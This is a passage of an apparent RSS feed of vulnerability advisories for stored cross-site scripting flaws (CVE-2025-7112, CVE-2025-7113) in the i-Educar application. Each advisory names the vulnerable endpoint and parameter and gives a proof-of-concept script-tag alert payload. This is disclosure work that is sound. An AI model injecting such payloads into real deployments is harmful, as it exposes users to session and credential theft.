&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7111.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7111.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 07 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-7112</title>
        <link>https://www.cvehunters.com/p/cve-2025-7112/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-7112/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-7112-cross-site-scripting-xss-stored-endpoint-educar_funcao_detphp-parameter-funcão&amp;#34;&amp;gt;CVE-2025-7112: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;educar_funcao_det.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Funcão&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7112&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7112&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_funcao_det.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Funcão&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_funcao_det.php?cod_funcao=COD&amp;amp;amp;ref_cod_instituicao=COD&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-7112-cross-site-scripting-xss-stored-endpoint-educar_funcao_detphp-parameter-funcão&amp;#34;&amp;gt;CVE-2025-7112: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;educar_funcao_det.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Funcão&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7112&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7112&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_funcao_det.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Funcão&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/intranet/educar_funcao_det.php?cod_funcao=COD&amp;amp;amp;ref_cod_instituicao=COD&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;Funcão&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;Funcão&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC VulDB i-Educar Pacxxx&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt; &amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7112/image.png&amp;#34;
	width=&amp;#34;1830&amp;#34;
	height=&amp;#34;977&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7112/image_hu_c648a8cea385efc9.png 480w, /p/cve-2025-7112/image_hu_5f86e83fa1837d9b.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;187&amp;#34;
		data-flex-basis=&amp;#34;449px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7112/image-1.png&amp;#34;
	width=&amp;#34;1811&amp;#34;
	height=&amp;#34;1013&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7112/image-1_hu_cc5ec209f8eaa4ed.png 480w, /p/cve-2025-7112/image-1_hu_9104ce786d725fe2.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;178&amp;#34;
		data-flex-basis=&amp;#34;429px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7112/image-2.png&amp;#34;
	width=&amp;#34;1761&amp;#34;
	height=&amp;#34;929&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7112/image-2_hu_c89aaa0af0099f1c.png 480w, /p/cve-2025-7112/image-2_hu_f51184360f4e8d6.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;189&amp;#34;
		data-flex-basis=&amp;#34;454px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;video-poc&amp;#34;&amp;gt;Video PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/R6vJIZnjdmE&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/R6vJIZnjdmE&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7112.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7112.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 07 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-7113</title>
        <link>https://www.cvehunters.com/p/cve-2025-7113/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-7113/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-7113-cross-site-scripting-xss-stored-endpoint-educar_componente_curricular_lstphp-parameter-nome&amp;#34;&amp;gt;CVE-2025-7113: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;educar_componente_curricular_lst.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7113&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7113&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_componente_curricular_lst.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Nome&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/module/ComponenteCurricular/edit?id=ID&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-7113-cross-site-scripting-xss-stored-endpoint-educar_componente_curricular_lstphp-parameter-nome&amp;#34;&amp;gt;CVE-2025-7113: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;educar_componente_curricular_lst.php&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;Nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7113&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-7113&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;educar_componente_curricular_lst.php&amp;lt;/code&amp;gt; endpoint of the i-Educar application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;Nome&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;/module/ComponenteCurricular/edit?id=ID&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;Nome&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;Nome&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-javascript&amp;#34; data-lang=&amp;#34;javascript&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;PoC VulDB i-Educar Pacxxx&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;err&amp;#34;&amp;gt;/script&amp;amp;gt;  &amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7113/image.png&amp;#34;
	width=&amp;#34;1831&amp;#34;
	height=&amp;#34;724&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7113/image_hu_d711a16372c343c4.png 480w, /p/cve-2025-7113/image_hu_607a4f81b3b0b224.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;252&amp;#34;
		data-flex-basis=&amp;#34;606px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7113/image-1.png&amp;#34;
	width=&amp;#34;1805&amp;#34;
	height=&amp;#34;900&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7113/image-1_hu_3f76544bd7d912b4.png 480w, /p/cve-2025-7113/image-1_hu_3c6daeb8a8f8d93b.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;200&amp;#34;
		data-flex-basis=&amp;#34;481px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-7113/image-2.png&amp;#34;
	width=&amp;#34;1846&amp;#34;
	height=&amp;#34;872&amp;#34;
	srcset=&amp;#34;/p/cve-2025-7113/image-2_hu_37cd16a8824fe8f6.png 480w, /p/cve-2025-7113/image-2_hu_c5787eb0386ae1dc.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;211&amp;#34;
		data-flex-basis=&amp;#34;508px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;video-poc&amp;#34;&amp;gt;Video PoC:
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://youtu.be/Dd4RdfomMms&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://youtu.be/Dd4RdfomMms&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7113.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7113.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/raul50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Raul Pazemécxas&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Mon, 07 Jul 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>XSS is not Dead - Hacktiba Pulse 07</title>
        <link>https://www.cvehunters.com/articles/xss-nao-esta-morto/</link>
        <guid>https://www.cvehunters.com/articles/xss-nao-esta-morto/</guid>
        <description>&amp;lt;h2 id=&amp;#34;introduction-xss-still&amp;#34;&amp;gt;Introduction: &amp;amp;ldquo;XSS? Still?&amp;amp;rdquo;
